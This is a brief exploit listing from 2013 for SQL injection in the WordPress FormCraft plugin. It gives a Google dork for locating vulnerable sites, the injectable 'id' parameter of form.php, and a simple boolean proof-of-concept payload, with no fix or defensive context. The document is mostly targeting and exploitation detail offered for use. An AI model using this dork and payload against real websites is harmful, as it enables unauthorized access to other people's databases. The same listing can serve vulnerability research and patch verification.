Wordpress formcraft Plugin Sql Injection

Exploit Author : Ashiyane Digital Security Team
Vuln. Plat.: Web Application
Tested on.: Windows , Linux
Date.: 2013/12/2
=============================================


Google Dork : inurl:/wp-content/plugins/formcraft

Exploit : Sql Injection

 Location1 :

[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]

A PoC: form.php?id=1%20and%20 1=1

tested me :D

oke sekian dari Clound tentang formcraft Plugin Wordpress